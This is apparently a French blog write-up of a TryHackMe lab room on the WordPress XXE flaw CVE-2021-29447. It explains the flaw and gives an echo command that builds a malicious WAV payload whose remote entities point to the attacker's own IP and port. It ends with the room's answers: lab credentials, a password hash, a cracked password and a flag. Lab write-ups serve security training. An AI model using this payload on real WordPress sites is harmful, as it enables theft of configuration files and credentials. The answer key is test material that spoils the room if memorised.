Nous avons couvert une vulnérabilité WordPress XXE CVE-2021-29447 qui permet la divulgation de fichiers sensibles et la falsification de requêtes côté serveur (SSRF). Nous avons exploité cette vulnérabilité WordPress en générant une charge utile WAV et en la téléchargeant sur le site Web WordPress compromis. Cela faisait partie de EssayezHackMe WordPress : CVE-2021-29447 Chambre.

Notes d'étude OSCP

Cours complet Splunk SIEM avec scénarios pratiques

Points forts

Qu'est-ce que la vulnérabilité XXE

Une attaque XML External Entity (XXE) est une vulnérabilité qui abuse des fonctionnalités des analyseurs/données XML. Cela permet souvent à un attaquant d'interagir avec n'importe quel système backend ou externe auquel l'application elle-même peut accéder et peut permettre à l'attaquant de lire le fichier sur ce système. Ils peuvent également provoquer une attaque par déni de service (DoS) ou utiliser XXE pour effectuer une falsification de requête côté serveur (SSRF), incitant l'application Web à adresser des requêtes à d'autres applications. XXE peut même permettre l'analyse des ports et conduire à l'exécution de code à distance.

Impact de WordPress CVE-2021-29447

  • Divulgation arbitraire de fichiers: Le contenu de n'importe quel fichier sur le système de fichiers de l'hôte peut être récupéré, par exemple wp-config.php qui contient des données sensibles telles que les informations d'identification de la base de données.
  • Falsification de requêtes côté serveur (SSRF): Des requêtes HTTP peuvent être effectuées au nom de l'installation WordPress. Selon l'environnement, cela peut avoir un impact sérieux.

Création de la charge utile

Vous pouvez créer une charge utile WAV à l'aide des commandes indiquées ci-dessous

nano poc.wav
# crée un fichier wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00 <!DOCTYPE ANY[ %remote;%init;%trick;]>\x00' > payload.wav
# collez la charge utile en utilisant echo, modifiez l'adresse IP et le port pour qu'ils correspondent au vôtre

Les références

  • WordPress 5.7 – Injection d'entité externe XML (XXE) « Bibliothèque multimédia » (authentifiée) : Exploit-DB
  • WordPress 5.6-5.7 – Authentifié (Auteur+) XXE (CVE-2021-29447) : GitHub
  • WordPress 5.6-5.7 – XXE authentifié dans la médiathèque affectant PHP 8 : wpscan

Réponses de la salle

D’après les résultats de #1, quel est le nom de la base de données pour WordPress ?

wordpressdb2

Sur la base des résultats de #1, quelles sont les informations d’identification que vous avez trouvées ?

exemple : utilisateur : mot de passe

la tangente sombre : sUp3rS3cret132

Énumérer et identifier quel est le SGBD installé sur le serveur ?

MySQL

D'après les résultats de #4, quelle est la version de dbms installée sur le serveur ?

5.7.33

D'après les résultats de #4, sur quel port le SGBD s'exécute-t-il ?

3306

Compromettre le dbms, quel est le mot de passe crypté situé dans la table des utilisateurs WordPress avec l'identifiant 1 ??

$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

Sur la base des résultats de #7, quel est le mot de passe dans le texte de la plainte ?

ours en peluche

Compromettre la machine et localiser flag.txt

thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}

Vidéo pas à pas

, , , , ,
Montrer les Commentaires

Motasem

A propos de l'Auteur

Je crée des notes de cybersécurité, des notes de marketing numérique et des cours en ligne. Je fournis également des conseils en marketing numérique, y compris, mais sans s'y limiter, le référencement, les publicités Google et Meta et l'administration CRM.

Voir les Articles